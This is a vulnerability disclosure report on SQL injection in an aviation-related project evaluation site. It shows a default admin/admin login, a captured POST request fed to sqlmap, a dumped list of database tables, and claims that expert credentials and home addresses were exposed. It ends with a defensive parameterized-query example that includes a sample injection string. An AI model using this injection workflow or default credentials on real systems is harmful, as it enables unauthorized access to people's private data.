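2015-09-09: Details reported to the vendor; awaiting vendor handling
2015-09-11: CNCERT (National Internet Emergency Center) has not yet been able to contact the organization concerned; details disclosed only to the reporting body
2015-09-21: Details disclosed to core white hats and experts in related fields
2015-10-01: Details disclosed to regular white hats
2015-10-11: Details disclosed to trainee white hats
2015-10-26: Details disclosed to the public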
233333
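URL: **.**.**.**/%28S%28x2yifd55ljqvcwmas1tlzoim%29%29/Login.aspx
Log in with admin/admin. Almost every input box is injectable... I'm speechless...
I won't list them one by one.
There are too many injection points, so I only demonstrate the data from one of them: capture the POST request and feed it to sqlmap.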
POST /%28S%28x2yifd55ljqvcwmas1tlzoim%29%29/XBXM/XMListManager.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/%28S%28x2yifd55ljqvcwmas1tlzoim%29%29/XBXM/XMListManager.aspx
X-Forwarded-For: **.**.**.**
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1282

__VIEWSTATE=%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%2BIOW9k%2BWJjemhte%2B8mjxmb250IGNvbG9yPSJibGFjayI%2BMTwvZm9udD4eC1JlY29yZGNvdW50ZmRkGAEFBWdkdlhNDxQrAApkZGRkZGQVAQNQSUQUKwABFCsAATJmAAEAAAD%2F%2F%2F%2F%2FAQAAAAAAAAAEAQAAAB9TeXN0ZW0uVW5pdHlTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAREYXRhCVVuaXR5VHlwZQxBc3NlbWJseU5hbWUBAAEICgIAAAAGAgAAAAALAgEUKwABMmYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAQBAAAAH1N5c3RlbS5Vbml0eVNlcmlhbGl6YXRpb25Ib2xkZXIDAAAABERhdGEJVW5pdHlUeXBlDEFzc2VtYmx5TmFtZQEAAQgKAgAAAAYCAAAAAAtk0e8oSugqA4TDpriRNs8%2BkXA2PJY%3D&__EVENTVALIDATION=%2FwEWEQLTwK2rCQLmmee%2FCQL4wa6BDQL4wbLkBAL4wYbfAwL4weqyCwL4wf6VAgKT%2BPDRDgKT%2BMS0BgKT%2BOhdApP4%2FLAIApP4wOsHAv%2FBw40DAq%2FQlx0C%2F%2FDzmAYC%2FPDzmAYCu6uxhgjTs1eYRKV%2BpJ9s2Nrxlj2O55eRLw%3D%3D&ddlYear=all&txtXMName=123&ddlStatus=all&Button2=%E6%9F%A5%E8%AF%A2
DBA privileges
8 databases
113 tables in the current database
[113 tables]
+-------------------------------+
| 123                           |
| ApplicationUnit               |
| CompactList_View              |
| Conceit                       |
| ConceitTime                   |
| Department                    |
| ExperUserMaster               |
| ExperUserPaper                |
| ExperUserResults              |
| Function                      |
| HY_LoginExperUser             |
| JDYJ_View                     |
| JD_Input                      |
| JD_Project_view               |
| Location                      |
| PJExpertNew_View              |
| PJExpert_View                 |
| PJ_Project_View               |
| PJ_View                       |
| PingJiang_SCCS                |
| PingJiang_View                |
| PingJing_SCCS_View            |
| PingShenView                  |
| Project                       |
| ProjectList_View              |
| ProjectPeople                 |
| ProjectPeopleView             |
| Project_SCCS                  |
| Project_SCCS_View             |
| Project_expert                |
| Project_ry                    |
| QUERY_PARA                    |
| Role                          |
| Role_Function                 |
| SB_Search_View                |
| Sheet1$                       |
| Users                         |
| VIEW1                         |
| VIEW_zaiyan                   |
| ViewCompact                   |
| ViewCompact111111111          |
| ViewContract                  |
| ViewDepartment                |
| ViewProject                   |
| ViewSPContract                |
| View_CheckZJPS                |
| View_Contract_JD              |
| View_JianDing                 |
| View_ZJ                       |
| compact                       |
| compact_htxx                  |
| compact_xmid                  |
| config                        |
| dtproperties                  |
| expert                        |
| expertJob                     |
| expertcount                   |
| gather                        |
| ht_config                     |
| ht_jfys                       |
| ht_sbyq                       |
| ht_xm                         |
| ht_xmjdap                     |
| ht_xmry                       |
| huojiang                      |
| jianding                      |
| jiandingapply                 |
| jiandingexpert                |
| jindubaogao                   |
| jindubaogao_Attitude          |
| jindubaogao_AttitudeFile      |
| jindubaogao_AttitudeFile_View |
| jindubaogao_Attitude_View     |
| jindufujian                   |
| pingjiang                     |
| pingjiangTime                 |
| pingshenyijian                |
| pj_Conceit                    |
| pj_config                     |
| pj_expertCount                |
| pj_expertJob                  |
| pj_project_expert             |
| projectView                   |
| project_conceit               |
| project_rkx                   |
| project_temp                  |
| projectbak                    |
| sysdiagrams                   |
| tp3_jfys                      |
| tp3_sbyq                      |
| tp3_xm                        |
| tp3_xmDW                      |
| tp3_xmHXR                     |
| tp3_xmjdap                    |
| tp3_xmry                      |
| tp3_xmtzze                    |
| tp4_jfys                      |
| tp4_xm                        |
| tp4_xmry                      |
| tp4_xmry_xmqk                 |
| tp5_XM                        |
| tp5_xmhjqk                    |
| tp5_xmwcdw                    |
| tp5_xmzywcr                   |
| v_contract                    |
| v_project                     |
| v_user_dept                   |
| viewjianding                  |
| viewjiandingapply             |
| viewjindu                     |
| xiangmulist                   |
| xm_pingjiang                  |
| zaiyan                        |
+-------------------------------+
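Experts' mobile numbers, usernames, passwords, home addresses and other information
Dumping the data is too slow, so I only dumped a few usernames and passwords as proof.
Filtering
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-09-11 14:35
CNVD confirmed and reproduced the reported issue and has handed it to CNCERT to notify the civil aviation industry evaluation center, which will coordinate follow-up handling with the organization that operates the site. It has also been reported in parallel to the higher-level national information security coordination body.
None yet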
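The fix suggested in the report is a single word, filtering. As an added example (not part of the original report and not the affected application's code), the code below handles the search form's three fields from the captured POST (ddlYear, txtXMName, ddlStatus) with allow-listed dropdowns and bound parameters, next to the string-concatenation pattern that typically produces this kind of injection. The table, columns, sample rows and dropdown values are assumptions, and sqlite3 stands in for the real database so the block runs offline.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are assumptions,
    # not the real schema of the affected application.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE project (name TEXT, year TEXT, status TEXT)")
    db.executemany("INSERT INTO project VALUES (?, ?, ?)", [
        ("bridge survey", "2014", "open"),
        ("runway study", "2015", "open"),
        ("radar trial", "2015", "closed"),
    ])
    return db

YEARS = {"all", "2014", "2015"}        # assumed ddlYear dropdown values
STATUSES = {"all", "open", "closed"}   # assumed ddlStatus dropdown values

def search_concat(db, ddlYear, txtXMName, ddlStatus):
    """Pattern that leads to the reported behaviour: input spliced into SQL text."""
    sql = "SELECT name FROM project WHERE name LIKE '%" + txtXMName + "%'"
    if ddlYear != "all":
        sql += " AND year = '" + ddlYear + "'"
    if ddlStatus != "all":
        sql += " AND status = '" + ddlStatus + "'"
    return [r[0] for r in db.execute(sql)]

def search_bound(db, ddlYear, txtXMName, ddlStatus):
    """Hardened form: allow-list the dropdowns, bind every value as a parameter."""
    if ddlYear not in YEARS or ddlStatus not in STATUSES:
        raise ValueError("dropdown value not in allow-list")
    # Escape LIKE wildcards so the text box is matched literally.
    pat = txtXMName.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT name FROM project WHERE name LIKE ? ESCAPE '\\'"
    args = ["%" + pat + "%"]
    if ddlYear != "all":
        sql += " AND year = ?"
        args.append(ddlYear)
    if ddlStatus != "all":
        sql += " AND status = ?"
        args.append(ddlStatus)
    return [r[0] for r in db.execute(sql, args)]

if __name__ == "__main__":
    db = make_db()
    probe = "zzz' OR 1=1 --"  # constructed input containing a quote
    print(search_concat(db, "all", probe, "all"))  # quote rewrites the query
    print(search_bound(db, "all", probe, "all"))   # quote is matched as data
```

Parameter binding addresses the injection itself; the DBA privileges reported above are a separate issue, addressed by giving the application's database account only the rights the application needs.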